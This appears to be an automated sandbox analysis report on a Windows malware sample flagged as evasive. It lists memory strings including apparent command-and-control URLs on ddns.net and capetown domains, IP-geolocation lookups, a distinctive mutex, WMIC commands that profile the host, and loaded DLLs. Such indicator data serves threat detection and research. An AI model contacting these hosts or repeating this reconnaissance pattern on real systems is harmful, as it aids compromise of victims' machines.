Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xweb.ddns.net:8080
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xweb.ddns.net:80806WinHttp.WinHttpRequest.5.16WinHttp.WinHttpRequest.5.16WinHttp.WinHttpReque
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xweb.ddns.net:80807http://xscapezo.capetown:8080
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkip.amazonaws.com/
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/1
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879731900.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country=
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879655271.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.1879788669.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryx2

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 52.17.181.189:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF587C	0_2_00EF587C
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE9029	0_2_00EE9029
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF8129	0_2_00EF8129
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE83A5	0_2_00EE83A5
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF4CD7	0_2_00EF4CD7
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EE9CAD	0_2_00EE9CAD
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEAF50	0_2_00EEAF50
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EF60C9	0_2_00EF60C9
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEE078	0_2_00EEE078
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEAA69	0_2_00EEAA69
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00F014D0	0_2_00F014D0
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEED20	0_2_00EEED20
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EEF6B7	0_2_00EEF6B7
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EFCE7D	0_2_00EFCE7D
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 0_2_00EFB610	0_2_00EFB610

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: String function: 00EE3DB2 appears 44 times

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal60.evad.winEXE@10/0@3/3

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Code function: 0_2_00EEAF50 CoInitialize,GetActiveObject,CoCreateInstance,CoGetObject,SysFreeString,VariantClear,

0_2_00EEAF50

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Mutant created: \Sessions\1\BaseNamedObjects\J1NXL04D3R_V3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe "C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe"
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Name
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Name	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic cpu get name	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
